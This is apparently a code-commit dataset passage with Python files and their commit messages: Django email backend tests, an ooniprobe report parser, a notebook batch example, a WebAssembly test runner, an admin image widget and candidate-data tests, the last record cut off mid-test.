from django.test import override_settings
from google.appengine.api.app_identity import get_application_id
# DJANGAE
from djangae.contrib import sleuth
from djangae.test import TestCase
class EmailBackendTests(TestCase):
def _get_valid_sender_address(self):
""" Return an email address which will be allowed as a 'from' address for the current App
Engine app.
"""
return "example@%s.appspotmail.com" % get_application_id()
@override_settings(EMAIL_BACKEND='djangae.mail.EmailBackend')
def test_send_email(self):
""" Test that sending an email using Django results in the email being sent through App
Engine.
"""
with sleuth.watch('djangae.mail.aeemail.EmailMessage.send') as gae_send:
send_mail("Subject", "Hello", self._get_valid_sender_address(), ["1@example.com"])
self.assertTrue(gae_send.called)
@override_settings(EMAIL_BACKEND='djangae.mail.AsyncEmailBackend')
def test_send_email_deferred(self):
""" Test that sending an email using Django results in the email being sent through App
Engine.
"""
with sleuth.watch('djangae.mail.aeemail.EmailMessage.send') as gae_send:
send_mail("Subject", "Hello", self._get_valid_sender_address(), ["1@example.com"])
self.process_task_queues()
self.assertTrue(gae_send.called)
|
Add some basic tests for the Djangae email backends.
|
Add some basic tests for the Djangae email backends.
|
Python
|
bsd-3-clause
|
potatolondon/djangae,potatolondon/djangae,grzes/djangae,grzes/djangae,grzes/djangae
|
Add some basic tests for the Djangae email backends.
|
# THIRD PARTY
from django.core.mail import send_mail
from django.test import override_settings
from google.appengine.api.app_identity import get_application_id
# DJANGAE
from djangae.contrib import sleuth
from djangae.test import TestCase
class EmailBackendTests(TestCase):
def _get_valid_sender_address(self):
""" Return an email address which will be allowed as a 'from' address for the current App
Engine app.
"""
return "example@%s.appspotmail.com" % get_application_id()
@override_settings(EMAIL_BACKEND='djangae.mail.EmailBackend')
def test_send_email(self):
""" Test that sending an email using Django results in the email being sent through App
Engine.
"""
with sleuth.watch('djangae.mail.aeemail.EmailMessage.send') as gae_send:
send_mail("Subject", "Hello", self._get_valid_sender_address(), ["1@example.com"])
self.assertTrue(gae_send.called)
@override_settings(EMAIL_BACKEND='djangae.mail.AsyncEmailBackend')
def test_send_email_deferred(self):
""" Test that sending an email using Django results in the email being sent through App
Engine.
"""
with sleuth.watch('djangae.mail.aeemail.EmailMessage.send') as gae_send:
send_mail("Subject", "Hello", self._get_valid_sender_address(), ["1@example.com"])
self.process_task_queues()
self.assertTrue(gae_send.called)
|
<commit_before><commit_msg>Add some basic tests for the Djangae email backends.<commit_after>
|
# THIRD PARTY
from django.core.mail import send_mail
from django.test import override_settings
from google.appengine.api.app_identity import get_application_id
# DJANGAE
from djangae.contrib import sleuth
from djangae.test import TestCase
class EmailBackendTests(TestCase):
def _get_valid_sender_address(self):
""" Return an email address which will be allowed as a 'from' address for the current App
Engine app.
"""
return "example@%s.appspotmail.com" % get_application_id()
@override_settings(EMAIL_BACKEND='djangae.mail.EmailBackend')
def test_send_email(self):
""" Test that sending an email using Django results in the email being sent through App
Engine.
"""
with sleuth.watch('djangae.mail.aeemail.EmailMessage.send') as gae_send:
send_mail("Subject", "Hello", self._get_valid_sender_address(), ["1@example.com"])
self.assertTrue(gae_send.called)
@override_settings(EMAIL_BACKEND='djangae.mail.AsyncEmailBackend')
def test_send_email_deferred(self):
""" Test that sending an email using Django results in the email being sent through App
Engine.
"""
with sleuth.watch('djangae.mail.aeemail.EmailMessage.send') as gae_send:
send_mail("Subject", "Hello", self._get_valid_sender_address(), ["1@example.com"])
self.process_task_queues()
self.assertTrue(gae_send.called)
|
Add some basic tests for the Djangae email backends.# THIRD PARTY
from django.core.mail import send_mail
from django.test import override_settings
from google.appengine.api.app_identity import get_application_id
# DJANGAE
from djangae.contrib import sleuth
from djangae.test import TestCase
class EmailBackendTests(TestCase):
def _get_valid_sender_address(self):
""" Return an email address which will be allowed as a 'from' address for the current App
Engine app.
"""
return "example@%s.appspotmail.com" % get_application_id()
@override_settings(EMAIL_BACKEND='djangae.mail.EmailBackend')
def test_send_email(self):
""" Test that sending an email using Django results in the email being sent through App
Engine.
"""
with sleuth.watch('djangae.mail.aeemail.EmailMessage.send') as gae_send:
send_mail("Subject", "Hello", self._get_valid_sender_address(), ["1@example.com"])
self.assertTrue(gae_send.called)
@override_settings(EMAIL_BACKEND='djangae.mail.AsyncEmailBackend')
def test_send_email_deferred(self):
""" Test that sending an email using Django results in the email being sent through App
Engine.
"""
with sleuth.watch('djangae.mail.aeemail.EmailMessage.send') as gae_send:
send_mail("Subject", "Hello", self._get_valid_sender_address(), ["1@example.com"])
self.process_task_queues()
self.assertTrue(gae_send.called)
|
<commit_before><commit_msg>Add some basic tests for the Djangae email backends.<commit_after># THIRD PARTY
from django.core.mail import send_mail
from django.test import override_settings
from google.appengine.api.app_identity import get_application_id
# DJANGAE
from djangae.contrib import sleuth
from djangae.test import TestCase
class EmailBackendTests(TestCase):
def _get_valid_sender_address(self):
""" Return an email address which will be allowed as a 'from' address for the current App
Engine app.
"""
return "example@%s.appspotmail.com" % get_application_id()
@override_settings(EMAIL_BACKEND='djangae.mail.EmailBackend')
def test_send_email(self):
""" Test that sending an email using Django results in the email being sent through App
Engine.
"""
with sleuth.watch('djangae.mail.aeemail.EmailMessage.send') as gae_send:
send_mail("Subject", "Hello", self._get_valid_sender_address(), ["1@example.com"])
self.assertTrue(gae_send.called)
@override_settings(EMAIL_BACKEND='djangae.mail.AsyncEmailBackend')
def test_send_email_deferred(self):
""" Test that sending an email using Django results in the email being sent through App
Engine.
"""
with sleuth.watch('djangae.mail.aeemail.EmailMessage.send') as gae_send:
send_mail("Subject", "Hello", self._get_valid_sender_address(), ["1@example.com"])
self.process_task_queues()
self.assertTrue(gae_send.called)
|
|
fc338d9095299ad5394ff92c6a50a50af960d3f2
|
genome_designer/variants/tests/test_materialized_view_manager.py
|
genome_designer/variants/tests/test_materialized_view_manager.py
|
"""
Tests for materialized_view_manager.py.
"""
from django.test import TestCase
from variants.materialized_view_manager import MATERIALIZED_TABLE_QUERYABLE_FIELDS_MAP
class TestMaterializedViewSchema(TestCase):
def test_queryable_fields_map(self):
"""Make sure the schema builds without errors.
"""
# Just check one of them and make sure it worked.
position_schema = MATERIALIZED_TABLE_QUERYABLE_FIELDS_MAP['position']
self.assertEquals(position_schema['type'], 'Integer')
|
Add test that goes with last commit.
|
Add test that goes with last commit.
|
Python
|
mit
|
woodymit/millstone,churchlab/millstone,churchlab/millstone,woodymit/millstone,woodymit/millstone,woodymit/millstone_accidental_source,woodymit/millstone,woodymit/millstone_accidental_source,churchlab/millstone,churchlab/millstone,woodymit/millstone_accidental_source,woodymit/millstone_accidental_source
|
Add test that goes with last commit.
|
"""
Tests for materialized_view_manager.py.
"""
from django.test import TestCase
from variants.materialized_view_manager import MATERIALIZED_TABLE_QUERYABLE_FIELDS_MAP
class TestMaterializedViewSchema(TestCase):
def test_queryable_fields_map(self):
"""Make sure the schema builds without errors.
"""
# Just check one of them and make sure it worked.
position_schema = MATERIALIZED_TABLE_QUERYABLE_FIELDS_MAP['position']
self.assertEquals(position_schema['type'], 'Integer')
|
<commit_before><commit_msg>Add test that goes with last commit.<commit_after>
|
"""
Tests for materialized_view_manager.py.
"""
from django.test import TestCase
from variants.materialized_view_manager import MATERIALIZED_TABLE_QUERYABLE_FIELDS_MAP
class TestMaterializedViewSchema(TestCase):
def test_queryable_fields_map(self):
"""Make sure the schema builds without errors.
"""
# Just check one of them and make sure it worked.
position_schema = MATERIALIZED_TABLE_QUERYABLE_FIELDS_MAP['position']
self.assertEquals(position_schema['type'], 'Integer')
|
Add test that goes with last commit."""
Tests for materialized_view_manager.py.
"""
from django.test import TestCase
from variants.materialized_view_manager import MATERIALIZED_TABLE_QUERYABLE_FIELDS_MAP
class TestMaterializedViewSchema(TestCase):
def test_queryable_fields_map(self):
"""Make sure the schema builds without errors.
"""
# Just check one of them and make sure it worked.
position_schema = MATERIALIZED_TABLE_QUERYABLE_FIELDS_MAP['position']
self.assertEquals(position_schema['type'], 'Integer')
|
<commit_before><commit_msg>Add test that goes with last commit.<commit_after>"""
Tests for materialized_view_manager.py.
"""
from django.test import TestCase
from variants.materialized_view_manager import MATERIALIZED_TABLE_QUERYABLE_FIELDS_MAP
class TestMaterializedViewSchema(TestCase):
def test_queryable_fields_map(self):
"""Make sure the schema builds without errors.
"""
# Just check one of them and make sure it worked.
position_schema = MATERIALIZED_TABLE_QUERYABLE_FIELDS_MAP['position']
self.assertEquals(position_schema['type'], 'Integer')
|
|
83b0a8e394f281ac41abe0be52c7560e285e0967
|
scripts/example_parser.py
|
scripts/example_parser.py
|
# This is an example of how to parse ooniprobe reports
import yaml
import sys
print "Opening %s" % sys.argv[1]
f = open(sys.argv[1])
yamloo = yaml.safe_load_all(f)
report_header = yamloo.next()
print "ASN: %s" % report_header['probe_asn']
print "CC: %s" % report_header['probe_cc']
print "IP: %s" % report_header['probe_ip']
print "Start Time: %s" % report_header['start_time']
print "Test name: %s" % report_header['test_name']
print "Test version: %s" % report_header['test_version']
for report_entry in yamloo:
print "Test: %s" % report_entry['test']
print "Input: %s" % report_entry['input']
print "Report: %s" % report_entry['report']
f.close()
|
Add a very simple example on how to securely parse the ooniprobe reports
|
Add a very simple example on how to securely parse the ooniprobe reports
|
Python
|
bsd-2-clause
|
Karthikeyan-kkk/ooni-probe,juga0/ooni-probe,lordappsec/ooni-probe,juga0/ooni-probe,kdmurray91/ooni-probe,Karthikeyan-kkk/ooni-probe,Karthikeyan-kkk/ooni-probe,lordappsec/ooni-probe,kdmurray91/ooni-probe,0xPoly/ooni-probe,lordappsec/ooni-probe,0xPoly/ooni-probe,juga0/ooni-probe,kdmurray91/ooni-probe,0xPoly/ooni-probe,0xPoly/ooni-probe,lordappsec/ooni-probe,juga0/ooni-probe,Karthikeyan-kkk/ooni-probe,kdmurray91/ooni-probe
|
Add a very simple example on how to securely parse the ooniprobe reports
|
# This is an example of how to parse ooniprobe reports
import yaml
import sys
print "Opening %s" % sys.argv[1]
f = open(sys.argv[1])
yamloo = yaml.safe_load_all(f)
report_header = yamloo.next()
print "ASN: %s" % report_header['probe_asn']
print "CC: %s" % report_header['probe_cc']
print "IP: %s" % report_header['probe_ip']
print "Start Time: %s" % report_header['start_time']
print "Test name: %s" % report_header['test_name']
print "Test version: %s" % report_header['test_version']
for report_entry in yamloo:
print "Test: %s" % report_entry['test']
print "Input: %s" % report_entry['input']
print "Report: %s" % report_entry['report']
f.close()
|
<commit_before><commit_msg>Add a very simple example on how to securely parse the ooniprobe reports<commit_after>
|
# This is an example of how to parse ooniprobe reports
import yaml
import sys
print "Opening %s" % sys.argv[1]
f = open(sys.argv[1])
yamloo = yaml.safe_load_all(f)
report_header = yamloo.next()
print "ASN: %s" % report_header['probe_asn']
print "CC: %s" % report_header['probe_cc']
print "IP: %s" % report_header['probe_ip']
print "Start Time: %s" % report_header['start_time']
print "Test name: %s" % report_header['test_name']
print "Test version: %s" % report_header['test_version']
for report_entry in yamloo:
print "Test: %s" % report_entry['test']
print "Input: %s" % report_entry['input']
print "Report: %s" % report_entry['report']
f.close()
|
Add a very simple example on how to securely parse the ooniprobe reports# This is an example of how to parse ooniprobe reports
import yaml
import sys
print "Opening %s" % sys.argv[1]
f = open(sys.argv[1])
yamloo = yaml.safe_load_all(f)
report_header = yamloo.next()
print "ASN: %s" % report_header['probe_asn']
print "CC: %s" % report_header['probe_cc']
print "IP: %s" % report_header['probe_ip']
print "Start Time: %s" % report_header['start_time']
print "Test name: %s" % report_header['test_name']
print "Test version: %s" % report_header['test_version']
for report_entry in yamloo:
print "Test: %s" % report_entry['test']
print "Input: %s" % report_entry['input']
print "Report: %s" % report_entry['report']
f.close()
|
<commit_before><commit_msg>Add a very simple example on how to securely parse the ooniprobe reports<commit_after># This is an example of how to parse ooniprobe reports
import yaml
import sys
print "Opening %s" % sys.argv[1]
f = open(sys.argv[1])
yamloo = yaml.safe_load_all(f)
report_header = yamloo.next()
print "ASN: %s" % report_header['probe_asn']
print "CC: %s" % report_header['probe_cc']
print "IP: %s" % report_header['probe_ip']
print "Start Time: %s" % report_header['start_time']
print "Test name: %s" % report_header['test_name']
print "Test version: %s" % report_header['test_version']
for report_entry in yamloo:
print "Test: %s" % report_entry['test']
print "Input: %s" % report_entry['input']
print "Report: %s" % report_entry['report']
f.close()
|
|
88e61467702e517d0db4ae11d584bcde0b7b0366
|
batch_eg.py
|
batch_eg.py
|
"""Example of using nbparameterise API to substitute variables in 'batch mode'
"""
from nbparameterise import code
from IPython.nbformat import current as nbformat
from IPython.nbconvert.preprocessors.execute import ExecutePreprocessor
from IPython.nbconvert.exporters.notebook import NotebookExporter
from IPython.nbconvert.writers import FilesWriter
stock_names = ['YHOO', 'MSFT', 'GOOG']
with open("Stock display.ipynb") as f:
nb = nbformat.read(f, 'ipynb')
definitions = code.extract_cell1_definitions(nb)
for name in stock_names:
print("Rendering for stock", name)
defined = []
for inp in definitions:
if inp.name =='stock':
# Fill in the current value
defined.append(inp.with_value(name))
else:
defined.append(inp)
code.replace_definitions(nb, defined)
# Run
resources = {}
nb, resources = ExecutePreprocessor().preprocess(nb, resources)
# Save
output, resources = NotebookExporter().from_notebook_node(nb, resources)
nbname = "Stock display %s" % name
FilesWriter().write(output, resources, notebook_name=nbname)
|
Add example of using API in batch mode
|
Add example of using API in batch mode
|
Python
|
mit
|
takluyver/nbparameterise
|
Add example of using API in batch mode
|
"""Example of using nbparameterise API to substitute variables in 'batch mode'
"""
from nbparameterise import code
from IPython.nbformat import current as nbformat
from IPython.nbconvert.preprocessors.execute import ExecutePreprocessor
from IPython.nbconvert.exporters.notebook import NotebookExporter
from IPython.nbconvert.writers import FilesWriter
stock_names = ['YHOO', 'MSFT', 'GOOG']
with open("Stock display.ipynb") as f:
nb = nbformat.read(f, 'ipynb')
definitions = code.extract_cell1_definitions(nb)
for name in stock_names:
print("Rendering for stock", name)
defined = []
for inp in definitions:
if inp.name =='stock':
# Fill in the current value
defined.append(inp.with_value(name))
else:
defined.append(inp)
code.replace_definitions(nb, defined)
# Run
resources = {}
nb, resources = ExecutePreprocessor().preprocess(nb, resources)
# Save
output, resources = NotebookExporter().from_notebook_node(nb, resources)
nbname = "Stock display %s" % name
FilesWriter().write(output, resources, notebook_name=nbname)
|
<commit_before><commit_msg>Add example of using API in batch mode<commit_after>
|
"""Example of using nbparameterise API to substitute variables in 'batch mode'
"""
from nbparameterise import code
from IPython.nbformat import current as nbformat
from IPython.nbconvert.preprocessors.execute import ExecutePreprocessor
from IPython.nbconvert.exporters.notebook import NotebookExporter
from IPython.nbconvert.writers import FilesWriter
stock_names = ['YHOO', 'MSFT', 'GOOG']
with open("Stock display.ipynb") as f:
nb = nbformat.read(f, 'ipynb')
definitions = code.extract_cell1_definitions(nb)
for name in stock_names:
print("Rendering for stock", name)
defined = []
for inp in definitions:
if inp.name =='stock':
# Fill in the current value
defined.append(inp.with_value(name))
else:
defined.append(inp)
code.replace_definitions(nb, defined)
# Run
resources = {}
nb, resources = ExecutePreprocessor().preprocess(nb, resources)
# Save
output, resources = NotebookExporter().from_notebook_node(nb, resources)
nbname = "Stock display %s" % name
FilesWriter().write(output, resources, notebook_name=nbname)
|
Add example of using API in batch mode"""Example of using nbparameterise API to substitute variables in 'batch mode'
"""
from nbparameterise import code
from IPython.nbformat import current as nbformat
from IPython.nbconvert.preprocessors.execute import ExecutePreprocessor
from IPython.nbconvert.exporters.notebook import NotebookExporter
from IPython.nbconvert.writers import FilesWriter
stock_names = ['YHOO', 'MSFT', 'GOOG']
with open("Stock display.ipynb") as f:
nb = nbformat.read(f, 'ipynb')
definitions = code.extract_cell1_definitions(nb)
for name in stock_names:
print("Rendering for stock", name)
defined = []
for inp in definitions:
if inp.name =='stock':
# Fill in the current value
defined.append(inp.with_value(name))
else:
defined.append(inp)
code.replace_definitions(nb, defined)
# Run
resources = {}
nb, resources = ExecutePreprocessor().preprocess(nb, resources)
# Save
output, resources = NotebookExporter().from_notebook_node(nb, resources)
nbname = "Stock display %s" % name
FilesWriter().write(output, resources, notebook_name=nbname)
|
<commit_before><commit_msg>Add example of using API in batch mode<commit_after>"""Example of using nbparameterise API to substitute variables in 'batch mode'
"""
from nbparameterise import code
from IPython.nbformat import current as nbformat
from IPython.nbconvert.preprocessors.execute import ExecutePreprocessor
from IPython.nbconvert.exporters.notebook import NotebookExporter
from IPython.nbconvert.writers import FilesWriter
stock_names = ['YHOO', 'MSFT', 'GOOG']
with open("Stock display.ipynb") as f:
nb = nbformat.read(f, 'ipynb')
definitions = code.extract_cell1_definitions(nb)
for name in stock_names:
print("Rendering for stock", name)
defined = []
for inp in definitions:
if inp.name =='stock':
# Fill in the current value
defined.append(inp.with_value(name))
else:
defined.append(inp)
code.replace_definitions(nb, defined)
# Run
resources = {}
nb, resources = ExecutePreprocessor().preprocess(nb, resources)
# Save
output, resources = NotebookExporter().from_notebook_node(nb, resources)
nbname = "Stock display %s" % name
FilesWriter().write(output, resources, notebook_name=nbname)
|
|
b560ac3bacab29c22ea1ed9ddc698d918e39e0dd
|
ml-proto/runtests.py
|
ml-proto/runtests.py
|
#!/usr/bin/env python
import os.path
import unittest
import subprocess
import glob
class RunTests(unittest.TestCase):
def _runTestFile(self, shortName, fileName):
absRunner = os.path.abspath("src/main.native")
print("\n// %s" % shortName)
exitCode = subprocess.call([absRunner, fileName])
self.assertEqual(0, exitCode, "test runner failed with exit code %i" % exitCode)
def generate_test_cases(cls, files):
for fileName in files:
absFileName = os.path.abspath(fileName)
attrName = fileName
testCase = lambda self : self._runTestFile(attrName, absFileName)
setattr(cls, attrName, testCase)
if __name__ == "__main__":
generate_test_cases(RunTests, glob.glob("test/*.wasm"))
unittest.main()
|
Add a simple automated test runner for all the .wasm files in the test directory
|
Add a simple automated test runner for all the .wasm files in the test directory
|
Python
|
apache-2.0
|
kg/spec,pjuftring/spec,maurer/spec,binji/spec,AndrewScheidecker/WebAssembly-spec,AugustusHuang/spec,incrediblesound/spec,eminemix/spec,marianoguerra/spec,naturaltransformation/spec,binji/spec,marianoguerra/spec,AndrewScheidecker/WebAssembly-spec,m4b/spec,d3spis3d/spec,AugustusHuang/spec,lindig/spec,maurer/spec,naturaltransformation/spec,Acidburn0zzz/spec,lindig/spec,Acidburn0zzz/spec,incrediblesound/spec,kg/spec,d3spis3d/spec,pjuftring/spec
|
Add a simple automated test runner for all the .wasm files in the test directory
|
#!/usr/bin/env python
import os.path
import unittest
import subprocess
import glob
class RunTests(unittest.TestCase):
def _runTestFile(self, shortName, fileName):
absRunner = os.path.abspath("src/main.native")
print("\n// %s" % shortName)
exitCode = subprocess.call([absRunner, fileName])
self.assertEqual(0, exitCode, "test runner failed with exit code %i" % exitCode)
def generate_test_cases(cls, files):
for fileName in files:
absFileName = os.path.abspath(fileName)
attrName = fileName
testCase = lambda self : self._runTestFile(attrName, absFileName)
setattr(cls, attrName, testCase)
if __name__ == "__main__":
generate_test_cases(RunTests, glob.glob("test/*.wasm"))
unittest.main()
|
<commit_before><commit_msg>Add a simple automated test runner for all the .wasm files in the test directory<commit_after>
|
#!/usr/bin/env python
import os.path
import unittest
import subprocess
import glob
class RunTests(unittest.TestCase):
def _runTestFile(self, shortName, fileName):
absRunner = os.path.abspath("src/main.native")
print("\n// %s" % shortName)
exitCode = subprocess.call([absRunner, fileName])
self.assertEqual(0, exitCode, "test runner failed with exit code %i" % exitCode)
def generate_test_cases(cls, files):
for fileName in files:
absFileName = os.path.abspath(fileName)
attrName = fileName
testCase = lambda self : self._runTestFile(attrName, absFileName)
setattr(cls, attrName, testCase)
if __name__ == "__main__":
generate_test_cases(RunTests, glob.glob("test/*.wasm"))
unittest.main()
|
Add a simple automated test runner for all the .wasm files in the test directory#!/usr/bin/env python
import os.path
import unittest
import subprocess
import glob
class RunTests(unittest.TestCase):
def _runTestFile(self, shortName, fileName):
absRunner = os.path.abspath("src/main.native")
print("\n// %s" % shortName)
exitCode = subprocess.call([absRunner, fileName])
self.assertEqual(0, exitCode, "test runner failed with exit code %i" % exitCode)
def generate_test_cases(cls, files):
for fileName in files:
absFileName = os.path.abspath(fileName)
attrName = fileName
testCase = lambda self : self._runTestFile(attrName, absFileName)
setattr(cls, attrName, testCase)
if __name__ == "__main__":
generate_test_cases(RunTests, glob.glob("test/*.wasm"))
unittest.main()
|
<commit_before><commit_msg>Add a simple automated test runner for all the .wasm files in the test directory<commit_after>#!/usr/bin/env python
import os.path
import unittest
import subprocess
import glob
class RunTests(unittest.TestCase):
def _runTestFile(self, shortName, fileName):
absRunner = os.path.abspath("src/main.native")
print("\n// %s" % shortName)
exitCode = subprocess.call([absRunner, fileName])
self.assertEqual(0, exitCode, "test runner failed with exit code %i" % exitCode)
def generate_test_cases(cls, files):
for fileName in files:
absFileName = os.path.abspath(fileName)
attrName = fileName
testCase = lambda self : self._runTestFile(attrName, absFileName)
setattr(cls, attrName, testCase)
if __name__ == "__main__":
generate_test_cases(RunTests, glob.glob("test/*.wasm"))
unittest.main()
|
|
332def912a107c2e8d281c3101f32cc5e846bc17
|
massmedia/widgets.py
|
massmedia/widgets.py
|
from django.utils.text import truncate_words
from django.contrib.admin.widgets import ForeignKeyRawIdWidget
class ForeignKeyRawIdImageWidget(ForeignKeyRawIdWidget):
"""
A Widget for displaying ForeignKeys in the "raw_id" interface and a thumbnail
rather than in a <select> box.
"""
def label_for_value(self, value):
key = self.rel.get_related_field().name
obj = self.rel.to._default_manager.get(**{key: value})
return ' <strong>%s</strong> %s' % (truncate_words(obj, 14),obj.thumb())
|
Add a rawIdImageWidget that can easily be used in admin. This widget will display a thumbnail of the selected image.
|
Add a rawIdImageWidget that can easily be used in admin. This widget will display a thumbnail of the selected image.
|
Python
|
apache-2.0
|
uclastudentmedia/django-massmedia,uclastudentmedia/django-massmedia
|
Add a rawIdImageWidget that can easily be used in admin. This widget will display a thumbnail of the selected image.
|
from django.utils.text import truncate_words
from django.contrib.admin.widgets import ForeignKeyRawIdWidget
class ForeignKeyRawIdImageWidget(ForeignKeyRawIdWidget):
"""
A Widget for displaying ForeignKeys in the "raw_id" interface and a thumbnail
rather than in a <select> box.
"""
def label_for_value(self, value):
key = self.rel.get_related_field().name
obj = self.rel.to._default_manager.get(**{key: value})
return ' <strong>%s</strong> %s' % (truncate_words(obj, 14),obj.thumb())
|
<commit_before><commit_msg>Add a rawIdImageWidget that can easily be used in admin. This widget will display a thumbnail of the selected image.<commit_after>
|
from django.utils.text import truncate_words
from django.contrib.admin.widgets import ForeignKeyRawIdWidget
class ForeignKeyRawIdImageWidget(ForeignKeyRawIdWidget):
"""
A Widget for displaying ForeignKeys in the "raw_id" interface and a thumbnail
rather than in a <select> box.
"""
def label_for_value(self, value):
key = self.rel.get_related_field().name
obj = self.rel.to._default_manager.get(**{key: value})
return ' <strong>%s</strong> %s' % (truncate_words(obj, 14),obj.thumb())
|
Add a rawIdImageWidget that can easily be used in admin. This widget will display a thumbnail of the selected image.from django.utils.text import truncate_words
from django.contrib.admin.widgets import ForeignKeyRawIdWidget
class ForeignKeyRawIdImageWidget(ForeignKeyRawIdWidget):
"""
A Widget for displaying ForeignKeys in the "raw_id" interface and a thumbnail
rather than in a <select> box.
"""
def label_for_value(self, value):
key = self.rel.get_related_field().name
obj = self.rel.to._default_manager.get(**{key: value})
return ' <strong>%s</strong> %s' % (truncate_words(obj, 14),obj.thumb())
|
<commit_before><commit_msg>Add a rawIdImageWidget that can easily be used in admin. This widget will display a thumbnail of the selected image.<commit_after>from django.utils.text import truncate_words
from django.contrib.admin.widgets import ForeignKeyRawIdWidget
class ForeignKeyRawIdImageWidget(ForeignKeyRawIdWidget):
"""
A Widget for displaying ForeignKeys in the "raw_id" interface and a thumbnail
rather than in a <select> box.
"""
def label_for_value(self, value):
key = self.rel.get_related_field().name
obj = self.rel.to._default_manager.get(**{key: value})
return ' <strong>%s</strong> %s' % (truncate_words(obj, 14),obj.thumb())
|
|
58712fe5669704b10927a6e9dc3ed560aed0b260
|
candidates/tests/test_get_data_for_popit.py
|
candidates/tests/test_get_data_for_popit.py
|
from django.test import TestCase
from candidates.models import get_person_data_from_dict
# All these are essentially tests for get_person_data_from_dict
class TestGetDataForPopIt(TestCase):
def test_get_person_data_from_dict(self):
form_data = {
'name': 'John Doe',
'email': 'john@example.org',
'birth_date': '',
'wikipedia_url': 'http://en.wikipedia.org/wiki/John_Doe',
'homepage_url': '',
'twitter_username': 'foobar',
'facebook_personal_url': '',
'facebook_page_url': '',
'party_ppc_page_url': '',
}
expected_result = {
'birth_date': None,
'contact_details': [
{
'type': 'twitter',
'value': 'foobar'
}
],
'email': u'john@example.org',
'links': [
{
'note': 'wikipedia', 'url': 'http://en.wikipedia.org/wiki/John_Doe'
}
],
'name': u'John Doe',
}
self.assertEqual(
get_person_data_from_dict(form_data),
expected_result
)
def test_get_person_data_from_dict_clear_email(self):
form_data = {
'name': 'John Doe',
'email': '',
'birth_date': '',
'wikipedia_url': 'http://en.wikipedia.org/wiki/John_Doe',
'homepage_url': '',
'twitter_username': 'foobar',
'facebook_personal_url': '',
'facebook_page_url': '',
'party_ppc_page_url': '',
}
expected_result = {
'birth_date': None,
'contact_details': [
{
'type': 'twitter',
'value': 'foobar'
}
],
'links': [
{
'note': 'wikipedia', 'url': 'http://en.wikipedia.org/wiki/John_Doe'
}
],
'name': u'John Doe',
}
self.assertEqual(
get_person_data_from_dict(form_data),
expected_result
)
|
Add tests for the current behaviour of get_person_data_from_dict
|
Add tests for the current behaviour of get_person_data_from_dict
|
Python
|
agpl-3.0
|
datamade/yournextmp-popit,mysociety/yournextmp-popit,datamade/yournextmp-popit,mysociety/yournextmp-popit,YoQuieroSaber/yournextrepresentative,YoQuieroSaber/yournextrepresentative,DemocracyClub/yournextrepresentative,datamade/yournextmp-popit,openstate/yournextrepresentative,openstate/yournextrepresentative,DemocracyClub/yournextrepresentative,mysociety/yournextmp-popit,neavouli/yournextrepresentative,mysociety/yournextrepresentative,openstate/yournextrepresentative,mhl/yournextmp-popit,mysociety/yournextmp-popit,mysociety/yournextrepresentative,openstate/yournextrepresentative,datamade/yournextmp-popit,mysociety/yournextrepresentative,mhl/yournextmp-popit,YoQuieroSaber/yournextrepresentative,mysociety/yournextrepresentative,neavouli/yournextrepresentative,mysociety/yournextmp-popit,datamade/yournextmp-popit,neavouli/yournextrepresentative,mysociety/yournextrepresentative,neavouli/yournextrepresentative,DemocracyClub/yournextrepresentative,YoQuieroSaber/yournextrepresentative,mhl/yournextmp-popit,neavouli/yournextrepresentative,YoQuieroSaber/yournextrepresentative,openstate/yournextrepresentative
|
Add tests for the current behaviour of get_person_data_from_dict
|
from django.test import TestCase
from candidates.models import get_person_data_from_dict
# All these are essentially tests for get_person_data_from_dict
class TestGetDataForPopIt(TestCase):
def test_get_person_data_from_dict(self):
form_data = {
'name': 'John Doe',
'email': 'john@example.org',
'birth_date': '',
'wikipedia_url': 'http://en.wikipedia.org/wiki/John_Doe',
'homepage_url': '',
'twitter_username': 'foobar',
'facebook_personal_url': '',
'facebook_page_url': '',
'party_ppc_page_url': '',
}
expected_result = {
'birth_date': None,
'contact_details': [
{
'type': 'twitter',
'value': 'foobar'
}
],
'email': u'john@example.org',
'links': [
{
'note': 'wikipedia', 'url': 'http://en.wikipedia.org/wiki/John_Doe'
}
],
'name': u'John Doe',
}
self.assertEqual(
get_person_data_from_dict(form_data),
expected_result
)
def test_get_person_data_from_dict_clear_email(self):
form_data = {
'name': 'John Doe',
'email': '',
'birth_date': '',
'wikipedia_url': 'http://en.wikipedia.org/wiki/John_Doe',
'homepage_url': '',
'twitter_username': 'foobar',
'facebook_personal_url': '',
'facebook_page_url': '',
'party_ppc_page_url': '',
}
expected_result = {
'birth_date': None,
'contact_details': [
{
'type': 'twitter',
'value': 'foobar'
}
],
'links': [
{
'note': 'wikipedia', 'url': 'http://en.wikipedia.org/wiki/John_Doe'
}
],
'name': u'John Doe',
}
self.assertEqual(
get_person_data_from_dict(form_data),
expected_result
)
|
<commit_before><commit_msg>Add tests for the current behaviour of get_person_data_from_dict<commit_after>
|
from django.test import TestCase
from candidates.models import get_person_data_from_dict
# All these are essentially tests for get_person_data_from_dict
class TestGetDataForPopIt(TestCase):
def test_get_person_data_from_dict(self):
form_data = {
'name': 'John Doe',
'email': 'john@example.org',
'birth_date': '',
'wikipedia_url': 'http://en.wikipedia.org/wiki/John_Doe',
'homepage_url': '',
'twitter_username': 'foobar',
'facebook_personal_url': '',
'facebook_page_url': '',
'party_ppc_page_url': '',
}
expected_result = {
'birth_date': None,
'contact_details': [
{
'type': 'twitter',
'value': 'foobar'
}
],
'email': u'john@example.org',
'links': [
{
'note': 'wikipedia', 'url': 'http://en.wikipedia.org/wiki/John_Doe'
}
],
'name': u'John Doe',
}
self.assertEqual(
get_person_data_from_dict(form_data),
expected_result
)
def test_get_person_data_from_dict_clear_email(self):
form_data = {
'name': 'John Doe',
'email': '',
'birth_date': '',
'wikipedia_url': 'http://en.wikipedia.org/wiki/John_Doe',
'homepage_url': '',
'twitter_username': 'foobar',
'facebook_personal_url': '',
'facebook_page_url': '',
'party_ppc_page_url': '',
}
expected_result = {
'birth_date': None,
'contact_details': [
{
'type': 'twitter',
'value': 'foobar'
}
],
'links': [
{
'note': 'wikipedia', 'url': 'http://en.wikipedia.org/wiki/John_Doe'
}
],
'name': u'John Doe',
}
self.assertEqual(
get_person_data_from_dict(form_data),
expected_result
)
|
Add tests for the current behaviour of get_person_data_from_dictfrom django.test import TestCase
from candidates.models import get_person_data_from_dict
# All these are essentially tests for get_person_data_from_dict
class TestGetDataForPopIt(TestCase):
def test_get_person_data_from_dict(self):
form_data = {
'name': 'John Doe',
'email': 'john@example.org',
'birth_date': '',
'wikipedia_url': 'http://en.wikipedia.org/wiki/John_Doe',
'homepage_url': '',
'twitter_username': 'foobar',
'facebook_personal_url': '',
'facebook_page_url': '',
